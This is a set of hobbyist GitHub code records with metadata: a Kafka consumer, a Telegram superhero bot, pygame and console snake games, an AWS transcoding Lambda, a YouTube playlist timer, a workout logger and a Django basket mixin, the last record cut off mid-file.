If already present, raises ValueError\n        \"\"\"\n        if sub_name not in self.subscribers:\n            self.subscribers[sub_name] = sub_obj\n        else:\n            raise ValueError(\n                \"Subscriber with name {} already exists\".format(sub_name))\n\n    def remove_subscriber(self, name):\n        \"\"\"\n        Remove a subscriber by the name `name`.\n\n        Parameters\n        ----------\n        name: str\n            name of the subscriber to delete\n        \"\"\"\n        # removes the subscriber and returns it, or None\n        subscriber = self.subscribers.pop(name, None)\n        if subscriber is None:\n            self.__logger.error(\n                \"Trying to remove subscriber with name {}, which does not exist.\"\n                .format(name))\n\n    def publish(self, message: Any):\n        \"\"\"\n        Send a message to all subscribers.\n\n        Parameters\n        ----------\n        message: Any\n            the message to send\n        \"\"\"\n        # pylint: disable=E1120\n        decoded = self.__decode(message)\n        if decoded:  # if it's not None :)\n            for _, subscriber in self.subscribers.items():\n                subscriber.receive(decoded)\n\n    def __decode(self, message: Message):\n        \"\"\"\n        Decode a message coming from Kafka.\n        It will become a Python dict.\n        \"\"\"\n        value = message.value()  # can be None, str, bytes\n\n        if value:\n            value = json.loads(value)  # the 'encoding' kwarg was removed in Python 3.9\n\n        return value\n\n    def on_shutdown(self):\n        self.running = False\n        self.subscribers = None\n        self.kafka.close()\n", "repo_name": "PCampi/unimib-simpss", "sub_path": "simpss_persistence/kafka_consumer/consumer.py", "file_name": "consumer.py", "file_ext": "py", "file_size_in_byte": 4525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pub_sub.Publisher", "line_number": 11, "usage_type": "name"}, {"api_name": "custom_logging.get_logger", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "pub_sub.Subscriber", "line_number": 31, "usage_type": "name"}, {"api_name": "confluent_kafka.Consumer", "line_number": 42, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "confluent_kafka.KafkaError._PARTITION_EOF", "line_number": 66, "usage_type": "attribute"}, {"api_name": "confluent_kafka.KafkaError", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 113, "usage_type": "name"}, {"api_name": "confluent_kafka.Message", "line_number": 128, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 136, "usage_type": "call"}]}
+{"seq_id": "74392132248", "text": "import requests\nimport const\n\n\nclass SendManager:\n\n def __init__(self, hero_manager, bot, chat_id):\n for one_hero in hero_manager.heroes:\n text_message = '' + one_hero.name + ' ' + '\\n' + \\\n 'Biography ' + '\\n' + \\\n 'Full name: ' + one_hero.full_name + '\\n' + \\\n 'Alter egos: ' + one_hero.alter_egos + '\\n' + \\\n 'Aliases: ' + one_hero.aliases + '\\n' + \\\n 'Place of birth: ' + one_hero.aliases + '\\n' + \\\n 'First appearance: ' + one_hero.first_appearance + '\\n' + \\\n 'Publisher: ' + one_hero.publisher + '\\n' + \\\n 'Appearance ' + '\\n' + \\\n 'Gender: ' + one_hero.gender + '\\n' + \\\n 'Race: ' + one_hero.race + '\\n' + \\\n 'Height: ' + one_hero.height + '\\n' + \\\n 'Weight: ' + one_hero.weight + '\\n' + \\\n 'Eye color: ' + one_hero.eye_color + '\\n' + \\\n 'Hair color: ' + one_hero.hair_color + '\\n' + \\\n 'Work ' + '\\n' + \\\n 'Occupation: ' + one_hero.occupation + '\\n' + \\\n 'Base: ' + one_hero.base + '\\n' + \\\n 'Connections ' + '\\n' + \\\n 'Group affiliation: ' + one_hero.group_affiliation + '\\n' + \\\n 'Relatives: ' + one_hero.relatives + '\\n'\n bot.send_photo(chat_id, one_hero.image, caption=text_message, parse_mode='HTML')\n\n\nclass HeroManager:\n\n def __init__(self, heroes_name):\n self.__session = requests.Session()\n self.hero_selected = False\n self.hero_count = 0\n self.error = None\n self.heroes = []\n self.__get_hero_by_name(heroes_name)\n\n def __get_hero_by_name(self, heroes_name):\n res = self.__session.get(const.url + '/search/' + heroes_name)\n try:\n if res.status_code != 200:\n self.error = 'Please try again later'\n raise Exception\n elif res.json()['response'] != 'success':\n self.error = res.json()['error'].capitalize()\n raise Exception\n hero_list = res.json()['results']\n for one_hero in hero_list:\n self.hero_selected = True\n self.hero_count += 1\n self.heroes.append(Hero(one_hero, self.__session))\n except Exception as ex:\n print(ex)\n\n\nclass Appearance(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__appearance = one_hero['appearance']\n self.gender = self.__appearance['gender']\n self.race = self.__appearance['race']\n self.height = ' / '.join(str(i) for i in (self.__appearance['height']))\n self.weight = ' / '.join(str(i) for i in (self.__appearance['weight']))\n self.eye_color = self.__appearance['eye-color']\n self.hair_color = self.__appearance['hair-color']\n\n\nclass Biography(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__biography = one_hero['biography']\n self.full_name = self.__biography['full-name']\n self.alter_egos = self.__biography['alter-egos']\n self.aliases = ', '.join(str(i) for i in (self.__biography['aliases']))\n self.place_of_birth = self.__biography['place-of-birth']\n self.first_appearance = self.__biography['first-appearance']\n self.publisher = self.__biography['publisher']\n\n\nclass Connections(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__connections = one_hero['connections']\n self.relatives = self.__connections['relatives']\n self.group_affiliation = self.__connections['group-affiliation']\n\n\nclass Work(object):\n def __init__(self, one_hero):\n self.__connections = one_hero['work']\n self.occupation = self.__connections['occupation']\n self.base = self.__connections['base']\n\n\nclass Hero(Appearance, Biography, Connections, Work):\n def __init__(self, one_hero, sess):\n super().__init__(one_hero)\n self.id = one_hero['id']\n self.name = 
one_hero['name']\n self.image = self.load_image(sess, one_hero['image']['url'])\n\n @staticmethod\n def load_image(sess, url):\n r = sess.get(url)\n if r.status_code == 200:\n return r.content\n else:\n return None\n", "repo_name": "BigForLy/SuperHeroInTelegram", "sub_path": "heroes_manager.py", "file_name": "heroes_manager.py", "file_ext": "py", "file_size_in_byte": 4644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.Session", "line_number": 36, "usage_type": "call"}, {"api_name": "const.url", "line_number": 44, "usage_type": "attribute"}]}
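The Hero class in the record above works through cooperative multiple inheritance: each mixin's __init__ forwards one_hero via super().__init__(one_hero), so Python's method resolution order visits Appearance, Biography and Connections in turn, and Work ends the chain by not delegating further. A stripped-down sketch of the same pattern:

class A:
    def __init__(self, data):
        super().__init__(data)   # delegates to B via the MRO of D
        self.a = data["a"]

class B:
    def __init__(self, data):
        super().__init__(data)   # delegates to C
        self.b = data["b"]

class C:
    def __init__(self, data):   # end of the chain: no super() call here,
        self.c = data["c"]      # so object.__init__ never receives 'data'

class D(A, B, C):
    def __init__(self, data):
        super().__init__(data)   # enters the chain at A

d = D({"a": 1, "b": 2, "c": 3})
print(d.a, d.b, d.c)             # 1 2 3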
+{"seq_id": "1010725129", "text": "#https://www.youtube.com/watch?v=rtwtOcfYKqc 출처 이수안컴퓨터연구소 유튜브\n\n\nimport pygame\n\nimport sys\n\nimport time\n\nimport random # import함수로 이미 만들어진 복잡한 함수를 끌어옴\n\n \n\n \n\nfrom pygame.locals import *\n\n \n\nWINDOW_WIDTH = 800\n\nWINDOW_HEIGHT = 600\n\nGRID_SIZE = 20\n\nGRID_WIDTH = WINDOW_WIDTH / GRID_SIZE\n\nGID_HEIGHT= WINDOW_HEIGHT / GRID_SIZE #게임화면의 크기설정\n\n \n\nWHITE = (255, 255, 255)\n\nGREEN = (0, 50, 0)\n\nORANGE = (250, 150, 0) #게임속 오브젝트의 색상 설정\n\n \n\nUP = (0, -1)\n\nDOWN = (0, 1)\n\nLEFT = (-1, 0)\n\nRIGHT = (1, 0) #게임의 메인오브젝트인 지렁이의 움직임 값 설정\n\n \n\nFPS = 10 #게임화면 프레임 설정\n\n \n\nclass Python(object): #object라는 클래스를 class함수로 설정 -지렁이\n\n def __init__(self): #def함수로 사용할self함수를 만듬\n\n self.create()\n\n self.color = GREEN #object개체의 색상설정\n\n \n\n def create(self):\n\n self.length = 2\n\n self.positions = [((WINDOW_WIDTH / 2), (WINDOW_HEIGHT / 2))]\n\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT]) #object의 움직임 설정\n\n \n\n def contorl(self, xy): #contorl함수 설정\n\n if (xy[0] * -1, xy[1] * -1) == self.direction:\n\n return\n\n else:\n\n self.direction = xy\n\n \n\n def move(self): #move함수 설정\n\n cur = self.positions[0]\n\n x, y = self.direction\n\n new = (((cur[0] + (x * GRID_SIZE)) % WINDOW_WIDTH), (cur[1] + (y * GRID_SIZE)) % WINDOW_HEIGHT)\n\n if new in self.positions[2:]:\n\n self.create()\n\n else:\n\n self.positions.insert(0, new)\n\n if len(self.positions) >self.length:\n\n self.positions.pop()\n\n \n\n def eat(self): #eat 함수설정\n\n self.length += 1\n\n \n\n def draw(self, surface): #draw함수설정\n\n for p in self.positions:\n\n draw_object(surface, self.color, p) \n\n \n\nclass Feed(object): #Feed라는객체생성 -지렁이가먹을 점\n\n def __init__(self):\n\n self.position = (0, 0)\n\n self.color = ORANGE\n\n self.create()\n\n \n\n def create(self): #랜��하게 생성되도록 random 모듈을 불러와서 설정해줌\n\n self.position = (random.randint(0, GRID_WIDTH - 1) * GRID_SIZE, random.randint(0, GID_HEIGHT - 1) *GRID_SIZE)\n\n \n\n def draw(self, surface):\n\n draw_object(surface, self.color, self.position)\n\n \n\ndef draw_object(surface, color, pos):\n\n r = pygame.Rect((pos[0], pos[1]), (GRID_SIZE, GRID_SIZE))\n\n pygame.draw.rect(surface, color, r)\n\n \n\ndef check_eat(python, feed):\n\n if python.positions[0] == feed.position:\n\n python.eat()\n\n feed.create()\n\n \n\n \n\n \n\nif __name__ == '__main__':\n\n python = Python() #지렁이\n\n feed = Feed() #점\n\n \n\n \n\n \n\n pygame.init()\n\n window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)\n\n pygame.display.set_caption('Python Game')\n\n surface = pygame.Surface(window.get_size())\n\n surface = surface.convert()\n\n surface.fill(WHITE)\n\n clock = pygame.time.Clock()\n\n pygame.key.set_repeat(1, 40)\n\n window.blit(surface, (0, 0))\n\n \n\n while True: #반복문을 사용해줌으로써 게임을 중지하기전까지 계속됨\n\n \n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n\n pygame.quit()\n\n sys.exit()\n\n elif event.type == KEYDOWN:\n\n if event.key == K_UP: #방향키를 누르면 움직이도록 방향키에 함수를 할당해줌\n\n pygame.control(UP)\n\n elif event.key == K_DOWN:\n\n pygame.control(DOWN)\n\n elif event.key == K_LEFT:\n\n pygame.control(LEFT)\n\n elif event.key == K_RIGHT:\n\n pygame.control(RIGHT)\n\n \n\n surface.fill(WHITE) #배경화면 색 설정\n\n python.move() #지렁이가 움직일 때 사용할 함수 할당\n\n check_eat(python, feed) #지렁이가 점을 먹을떄마다 길어지도록 할당\n\n speed = (FPS + python.length) / 2 #지렁이가 길어질때마다 속도가 올라가도록 할당\n\n python.draw(surface) #화면에 지렁이가 나타나게 해줌\n\n feed.draw(surface) #화면에 점이 나타나게 해줌\n\n window.blit(surface, (0, 0))\n\n pygame.display.flip()\n\n 
pygame.display.update()\n\n clock.tick(speed)", "repo_name": "bidulgi9g9/Practice3", "sub_path": "FirstGame.py", "file_name": "FirstGame.py", "file_ext": "py", "file_size_in_byte": 4483, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "random.choice", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 136, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 180, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 184, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 210, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 228, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 248, "usage_type": "attribute"}]}
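In the event loop above, the arrow keys are meant to steer the snake through the instance's own method (spelled contorl in the class), not through the pygame module. A minimal sketch of that routing, assuming a snake object that exposes a control(direction) method:

import pygame, sys
from pygame.locals import QUIT, KEYDOWN, K_UP, K_DOWN, K_LEFT, K_RIGHT

UP, DOWN, LEFT, RIGHT = (0, -1), (0, 1), (-1, 0), (1, 0)
KEYMAP = {K_UP: UP, K_DOWN: DOWN, K_LEFT: LEFT, K_RIGHT: RIGHT}

def handle_events(snake):
    # Route arrow-key presses to the snake object; quit cleanly on window close.
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYDOWN and event.key in KEYMAP:
            snake.control(KEYMAP[event.key])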
+{"seq_id": "17753981861", "text": "import os\r\nimport boto3\r\nimport urllib\r\n\r\n\r\n\r\ndef lambda_handler(event, context):\r\n \r\n transcoder = boto3.client('elastictranscoder', 'us-east-1')\r\n #pipeline_id = get_pipeline(transcoder, 'Audio Files')\r\n pipeline_id = '1542792399420-5itz1q'\r\n \r\n \r\n base_filename_ext = os.path.basename(event['Records'][0]['s3']['object']['key'])\r\n \r\n dir_name = os.path.dirname((event['Records'][0]['s3']['object']['key']))\r\n listPath = dir_name.split(\"/\")\r\n \r\n base_filename_space = base_filename_ext.replace(\"+\", \" \")\r\n base_filename_nospace = base_filename_ext.replace(\"+\", \"-\")\r\n \r\n #(dir_name,base_filename1) = os.path.split((event['Records'][0]['s3']['object']['key']))\r\n #base_filename = os.path.splitext(event['Records'][0]['s3']['object']['key'])[0]\r\n base_filename = os.path.splitext(base_filename_nospace)[0]\r\n \r\n if 'appvideo' in listPath :\r\n \r\n job = transcoder.create_job(\r\n PipelineId=pipeline_id,\r\n Input={\r\n 'Key': create_aws_filename(dir_name, base_filename_space, '') ,\r\n 'FrameRate': 'auto',\r\n 'Resolution': 'auto',\r\n 'AspectRatio': 'auto',\r\n 'Interlaced': 'auto',\r\n 'Container' : 'auto',\r\n },\r\n Outputs=[\r\n {\r\n 'Key': create_aws_filename( dir_name , 'thrash'+ base_filename, '.mp3'),\r\n 'PresetId': '1539263753954-rco815',\r\n #'SegmentDuration': '1',\r\n 'ThumbnailPattern': '' + dir_name +'/'+ base_filename + '/Thumbnail_' + base_filename + '-{resolution}' + '-{count}',\r\n },\r\n {\r\n 'Key': create_aws_filename( dir_name +'/'+ base_filename , '480_' + base_filename, '.mp4'),\r\n 'PresetId': '1351620000001-000020'\r\n #Generic 480p \r\n },\r\n #{\r\n #'Key': create_aws_filename(dir_name +'/'+ base_filename, '360_' + base_filename, '.mp4'),\r\n #'PresetId': '1351620000001-000040'\r\n #Generic 360p \r\n #},\r\n {\r\n 'Key': create_aws_filename( dir_name +'/'+ base_filename, '240_' + base_filename, '.mp4'),\r\n 'PresetId': '1539243908519-gd0pkr'\r\n #Generic 240p \r\n } \r\n ]\r\n )\r\n \r\n job_id = job['Job']['Id']\r\n waiter = transcoder.get_waiter('job_complete')\r\n waiter.wait(Id=job_id)\r\n \r\n bucket = 'uploadinput'\r\n key = create_aws_filename(dir_name, base_filename_space, '')\r\n s34 = boto3.client('s3')\r\n s34.delete_object(Bucket=bucket, Key=key)\r\n #bucket = s3.Bucket('uploadinput')\r\n #s3 = boto3.resouce('s3')\r\n #s3.Object(bucket.name,key).delete()\r\n \r\n\r\n \r\n return job \r\n ", "repo_name": "ritesshguptaa/SampleCode", "sub_path": "awsLambda.py", "file_name": "awsLambda.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "boto3.client", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "27152223165", "text": "import time, re\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\n\r\n\r\n\r\n#URL = ''\r\nURL = input('input your youtube playlist URL: ')\r\ndriver = webdriver.Chrome()\r\ndriver.get(URL)\r\ntime.sleep(2)\r\nday, hour, minuate, second = 0, 0, 0, 0\r\ntime_re = re.compile('([0-9]*):([0-9]*)')\r\nsoup = BeautifulSoup(driver.page_source, 'html.parser')\r\nAllvideos = soup.findAll('span', {'class':'style-scope ytd-thumbnail-overlay-time-status-renderer'})\r\nfor i in Allvideos:\r\n minuate += int(time_re.search(i.string.strip()).group(1))\r\n second += int(time_re.search(i.string.strip()).group(2))\r\n\r\nminuate += second//60\r\nsecond = second%60\r\nhour += minuate//60\r\nminuate = minuate%60\r\nday += hour//24\r\nhour = hour%24\r\n\r\nprint('total length of playlist videos is {}d {}h {}m {}s.'.format(day, hour, minuate, second))\r\n", "repo_name": "gusfhr777/youtube_time_checker", "sub_path": "time_checker.py", "file_name": "time_checker.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "3811921684", "text": "import requests\nimport datetime as dt\nimport os\n\nnow = dt.datetime.today()\ndate = now.date()\nDATETIME = date.strftime('%d/%m/%Y')\nNOWTIME = now.strftime('%X')\n\nNUTRITIONIX_API_ID = os.environ.get('NUTRITIONIX_API_ID')\nNUTRITION_API_KEY = os.environ.get('NUTRITION_API_KEY')\nSHEETY_BASIC = os.environ.get('SHEETY_BASIC')\nLOGNAME = os.environ.get('LOGNAME')\nPASSWORD = os.environ.get('SHEETY_PASS')\n\nurl = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\nSHEET_API = os.environ.get('SHEET_ENDPOINT')\n\n\nheaders = {\n \"x-app-id\": NUTRITIONIX_API_ID,\n \"x-app-key\": NUTRITION_API_KEY,\n \"Content-Type\": \"application/json\"\n}\n\n# 適当な設定\nparams = {\n \"query\": input(\"Tell me which exercises you did: \"),\n \"gender\": \"male\",\n \"weight_kg\": 80.0,\n \"age\": 28\n}\nresponse = requests.post(url=url, json=params, headers=headers).json()\n\n\nfor exercise in response[\"exercises\"]:\n sheet_input = {\n \"workout\": {\n \"date\": DATETIME,\n \"time\": NOWTIME,\n \"exercise\": exercise[\"name\"].title(),\n \"duration\": exercise[\"duration_min\"],\n \"calories\": exercise[\"nf_calories\"]\n }\n }\n\n\nsheet_post = {\n \"email\": {\n \"name\": \"トムちゃん\",\n \"email\": os.environ.get(\"GOOGLE_EMAIL\"),\n }\n}\n\nbasic = f\"Basic {SHEETY_BASIC}\"\n\nauth = (LOGNAME, PASSWORD)\n\n\npost_sheet = requests.post(\n url=SHEET_API, json=sheet_input, auth=auth)\n\nprint(post_sheet.text)\n", "repo_name": "tomuyamukun/python_3", "sub_path": "Workout_tracking/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.today", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "71329314651", "text": "from django.views import View\n\nfrom mainapp.models import Profile\nfrom order.models import Basket\n\n\nclass BasketMixin(View):\n\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n profile = Profile.objects.filter(user=request.user).first()\n if not profile:\n profile = Profile.objects.create(\n user=request.user\n )\n basket = Basket.objects.filter(owner=profile, in_order=False).first()\n if not basket:\n basket = Basket.objects.create(owner=profile)\n else:\n basket = Basket.objects.filter(for_anonymous_user=True).first()\n if not basket:\n basket = Basket.objects.create(for_anonymous_user=True)\n\n self.basket = basket\n return super().dispatch(request, *args, **kwargs)\n", "repo_name": "Ireal-ai/Django_Shop", "sub_path": "shopDjango/order/mixins.py", "file_name": "mixins.py", "file_ext": "py", "file_size_in_byte": 872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 7, "usage_type": "name"}, {"api_name": "mainapp.models.Profile.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "mainapp.models.Profile.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mainapp.models.Profile", "line_number": 11, "usage_type": "name"}, {"api_name": "mainapp.models.Profile.objects.create", "line_number": 13, "usage_type": "call"}, {"api_name": "mainapp.models.Profile.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mainapp.models.Profile", "line_number": 13, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 16, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 18, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 20, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.create", "line_number": 22, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "35927958181", "text": "import random\nimport os\nfrom pynput.keyboard import Controller,Key,Listener\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n\nclass Sanke:\n def __init__(self, currentHeadOrientation, snakeLeng, width, height):\n lcs = locals()\n lcs.pop('self')\n self.__dict__.update(lcs)\n self.bodyList = [[0]*2]*snakeLeng\n self.snakeLeng = snakeLeng\n # 蛇的爬行方向\n self.orientation = []\n self.width = width\n self.height = height\n self.snakeBody = \"*\" # 数组被填充字符串\n self.snakeHead = \"@\" # 蛇头填充\n self.fruitPoint = [0]*2 # 果实位置\n self.fruitStr = \"O\" # 果实填充\n\n \n # 蛇向前爬行\n def wriggle(self):\n # if self.currentHeadOrientation == \"up\":\n # print(\"向上爬\")\n # if self.currentHeadOrientation == \"down\":\n # print(\"向下爬\")\n # if self.currentHeadOrientation == \"left\":\n # print(\"向左爬\")\n # if self.currentHeadOrientation == \"right\":\n # print(\"向右爬\")\n self.generatesFruit()\n self.addSnakeBody()\n self.updateLocation()\n self.updateSite()\n \n # 增加蛇身长度\n def addSnakeBody(self):\n snake_copy = self.bodyList.copy()\n for i in range(len(snake_copy)):\n if i == 0:\n if self.currentHeadOrientation == \"up\":\n self.bodyList[i] = [snake_copy[i][0]-1, snake_copy[i][1]]\n if self.currentHeadOrientation == \"down\":\n self.bodyList[i] = [snake_copy[i][0]+1, snake_copy[i][1]]\n if self.currentHeadOrientation == \"left\":\n self.bodyList[i] = [snake_copy[i][0], snake_copy[i][1]-1]\n if self.currentHeadOrientation == \"right\":\n self.bodyList[i] = [snake_copy[i][0], snake_copy[i][1]+1]\n if self.bodyList[i] == self.fruitPoint:\n # print(\"*-*-*-**-\")\n self.bodyList.append(self.bodyList[-1])\n self.fruitPoint = [0]*2\n continue\n self.bodyList[i] = snake_copy[i-1]\n \n # 更换蛇头朝向\n def changeOrientation(self, type = None):\n self.orientation = [0]*3\n first_x = self.bodyList[0][1]\n first_y = self.bodyList[0][0]\n second_x = self.bodyList[1][1]\n second_y = self.bodyList[1][0]\n if first_y == second_y:\n self.orientation[0] = \"up\"\n self.orientation[1] = \"down\"\n if first_x > second_x :\n self.orientation[2] = \"right\"\n else:\n self.orientation[2] = \"left\"\n \n if first_x == second_x:\n self.orientation[0] = \"left\"\n self.orientation[1] = \"right\"\n if first_y > second_y :\n self.orientation[2] = \"down\"\n else:\n self.orientation[2] = \"up\"\n\n # print(\"当前可操作:\", self.orientation)\n\n if type != None:\n if type in self.orientation:\n self.currentHeadOrientation = type\n else:\n print(\"此方向爬不动哦\")\n return False\n else:\n self.currentHeadOrientation = self.orientation[random.randint(0, len(self.orientation)-1)]\n # print(\"当前朝向\", self.currentHeadOrientation)\n return True\n \n # 更新蛇的位置\n def updateLocation(self):\n for i in range(height):\n site[i] = [0]*width\n for j in range(width):\n site[i][j] = defaultBody\n if self.fruitPoint[0] + self.fruitPoint[1] > 0:\n site[self.fruitPoint[0]][self.fruitPoint[1]] = self.fruitStr\n\n site[self.bodyList[0][0]][self.bodyList[0][1]] = self.snakeHead\n for i in range(len(self.bodyList)-1):\n i = i + 1\n site[self.bodyList[i][0]][self.bodyList[i][1]] = self.snakeBody\n\n # 初始化蛇的位置\n def initSnake(self):\n first_x = random.randint(5, self.width-5)\n first_y = random.randint(5, self.height-5)\n self.bodyList[0] = [first_y, first_x-1]\n site[first_y][first_x-1] = self.snakeHead\n for i in range(self.snakeLeng-1):\n i = i + 1\n first_x = first_x + 1\n first_y = first_y\n self.bodyList[i] = [first_y, first_x-1]\n site[first_y][first_x-1] = self.snakeBody\n self.updateSite()\n self.changeOrientation()\n \n 
# 随机生成果实\n def generatesFruit(self):\n if self.fruitPoint[0] + self.fruitPoint[1] > 0:\n return\n \n pointList = []\n for i in range(height):\n tmp = []\n for j in range(width):\n tmp = [i, j]\n if tmp in self.bodyList:\n pass\n else:\n pointList.append(tmp)\n\n point = random.randint(0, len(pointList)-1)\n self.fruitPoint = pointList[point]\n print(\"果实位置:\", self.fruitPoint)\n \n\n\n \n # 刷新场地\n def updateSite(self):\n os.system('cls')\n print(\"蛇身长:\", len(self.bodyList))\n arr = []\n for i in range(height):\n arr = [\"-\"]*len(site[i])\n if i <= 0:\n print(\"\".join(arr))\n print( \"|\" + \"\".join(site[i]) + \"|\")\n print(\"\".join(arr))\n # print(\"当前位置:\", self.bodyList)\n \n # 监听释放\n def on_release(self, key):\n if key==Key.up:\n result = self.changeOrientation(\"up\")\n if result == True:\n self.wriggle()\n if key==Key.down:\n result = self.changeOrientation(\"down\")\n if result == True:\n self.wriggle()\n if key==Key.left:\n result = self.changeOrientation(\"left\")\n if result == True:\n self.wriggle()\n if key==Key.right:\n result = self.changeOrientation(\"right\")\n if result == True:\n self.wriggle()\n if key==Key.esc:\n # 停止监听\n return False\n \n\nheight = 29 # 数组个数\nwidth = 60 # 数组长度\nsite = ['0']*height # 场地高度\ndefaultBody = \" \" # 默认数组填充字符串\n\n# 初始化场地\ndef initSite():\n for i in range(height):\n site[i] = [0]*width\n for j in range(width):\n site[i][j] = defaultBody\n\n\n\n\n# 开始监听\ndef start_listen(snake):\n with Listener(on_release=snake.on_release) as listener:\n listener.join()\n\ndef run():\n print(\"----------------------------------------------------------------------------------------------------------\")\n # 创建一条蛇\n 